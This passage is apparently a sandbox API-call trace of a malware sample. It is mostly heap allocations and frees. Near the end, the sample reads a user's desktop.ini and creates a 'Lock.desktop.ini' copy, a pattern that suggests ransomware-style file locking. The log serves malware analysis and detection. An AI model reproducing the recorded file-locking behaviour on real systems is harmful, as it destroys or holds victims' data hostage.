Size=0x10) returned 0x2e50cb0 [0142.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0142.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0142.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0142.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0142.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0142.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0142.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0142.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0142.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0142.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0142.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0142.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0142.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0142.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0142.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0142.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0142.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0142.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0142.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0142.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0142.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0142.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0142.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0142.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0142.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0142.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0142.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0142.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0142.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0142.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0142.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0142.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0142.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0142.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0142.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0142.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0142.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0142.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0142.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0142.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0142.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0142.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0142.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0142.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0142.234] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0142.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0142.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0142.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0142.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0142.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0142.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0142.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0142.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0142.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0142.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0142.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0142.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0142.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0142.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0142.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0142.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0142.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0142.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0142.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0142.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0142.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0142.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0142.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0142.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0142.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0142.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0142.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0142.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0142.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0142.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0142.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0142.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0142.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0142.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0142.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0142.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0142.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0142.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0142.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0142.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0142.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0142.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0142.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0142.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0142.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0142.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0142.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0142.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0142.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0142.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0142.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0142.237] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0142.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0142.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0142.237] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0142.238] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0142.238] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0142.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0142.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0142.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0142.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0142.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0142.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0142.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0142.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0142.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0142.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0142.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0142.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0142.241] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/desktop.ini" (normalized: "c:\\users\\fd1hvy\\desktop\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0142.241] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.241] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0142.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0142.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0142.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0142.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0142.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0142.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0142.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0142.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0142.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0142.242] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0142.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0142.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0142.242] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0142.242] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0142.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0142.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0142.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0142.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0142.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0142.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0142.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0142.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0142.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0142.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0142.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0142.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0142.242] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0142.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0142.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0142.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0142.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0142.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0142.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0142.243] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.desktop.ini" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0142.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0142.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0142.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0142.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0142.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0142.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0142.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0142.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0142.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0142.244] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0142.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0142.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0142.244] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0142.244] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0142.244] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0142.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0142.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0142.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0142.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0142.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0142.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0142.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0142.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0142.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0142.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0142.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0142.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0142.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0142.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0142.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3ded020 [0142.356] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0142.356] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x11a, lpOverlapped=0x0) returned 1 [0142.358] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0142.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0142.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0142.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0142.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0142.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11a) returned 0x2e56430 [0142.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3ded020 | out: hHeap=0x970000) returned 1 [0142.362] HeapFree (in: hHeap=0x970000, 